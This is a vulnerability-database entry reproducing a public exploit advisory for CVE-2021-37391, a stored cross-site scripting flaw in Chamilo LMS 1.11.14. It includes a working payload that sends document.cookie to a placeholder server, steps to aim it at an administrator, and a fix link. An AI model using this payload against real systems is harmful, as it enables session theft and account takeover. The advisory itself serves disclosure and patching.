Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSirpedrotavaresPACKETSTORM:165807
HistoryFeb 02, 2022 - 12:00 a.m.

Chamilo LMS 1.11.14 Cross Site Scripting / Account Takeover

2022-02-0200:00:00
sirpedrotavares
packetstormsecurity.com
201
chamilo lms 1.11.14
cross site scripting
account takeover
cve-2021-37391
social network
stored xss
vulnerabilities

EPSS

0.001

Percentile

28.4%

JSON
`# Exploit Title: Chamilo LMS 1.11.14 - Account Takeover  
# Date: July 21 2021  
# Exploit Author: sirpedrotavares  
# Vendor Homepage: https://chamilo.org  
# Software Link: https://chamilo.org  
# Version: Chamilo-lms-1.11.x  
# Tested on: Chamilo-lms-1.11.x  
# CVE: CVE-2021-37391  
#Publication:  
https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities  
  
  
Description: A user without privileges in Chamilo LMS 1.11.x can send an  
invitation message to another user, e.g., the administrator, through  
main/social/search.php,  
main/inc/lib/social.lib.php and steal cookies or execute arbitrary code on  
the administration side via a stored XSS vulnerability via social network  
the send invitation feature. .  
CVE ID: CVE-2021-37391  
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N  
URL:  
https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities  
  
Affected parameter: send private message - text field  
Payload: <img src=x onerror=this.src='  
http://yourserver/?c='+document.cookie>  
  
  
Steps to reproduce:  
1. Navigate to the social network menu  
2. Select the victim profile  
3. Add the payload on the text field  
4. Submit the request and wait for the payload execution  
  
*Impact:* By using this vulnerability, an unprivileged user can steal  
cookies from an admin account or force the administrator to create an  
account with admin privileges with an HTTP 302 redirect.  
*Mitigation*: Update the Chamilo to the latest version.  
*Fix*:  
https://github.com/chamilo/chamilo-lms/commit/de43a77049771cce08ea7234c5c1510b5af65bc8  
  
  
  
  
Com os meus melhores cumprimentos,  
--  
*Pedro Tavares*  
Founder and Editor-in-Chief at seguranca-informatica.pt  
Co-founder of CSIRT.UBI  
Creator of 0xSI_f33d <https://feed.seguranca-informatica.pt/>  
  
  
  
seguranca-informatica.pt | @sirpedrotavares  
<https://twitter.com/sirpedrotavares> | 0xSI_f33d  
<https://feed.seguranca-informatica.pt/>  
  
`

Related

prion 1
osv 1
zdt 1
cvelist 1
exploitdb 1
nvd 1
cve 1
openvas 1
prion
prion
Cross site scripting
2021-08-10 20:15:00
osv
osv
CVE-2021-37391
2021-08-10 20:15:08
zdt
zdt
Chamilo LMS 1.11.14 - Account Takeover Vulnerability
2022-02-02 00:00:00
cvelist
cvelist
CVE-2021-37391
2021-08-10 19:02:34
exploitdb
exploitdb
Chamilo LMS 1.11.14 - Account Takeover
2022-02-02 00:00:00
nvd
nvd
CVE-2021-37391
2021-08-10 20:15:08
cve
cve
CVE-2021-37391
2021-08-10 20:15:08
openvas
openvas
Chamilo LMS < 1.11.16 Multiple Vulnerabilities
2021-08-11 00:00:00

EPSS

0.001

Percentile

28.4%

JSON
Related for PACKETSTORM:165807
prion1osv1zdt1cvelist1exploitdb1nvd1cve1openvas1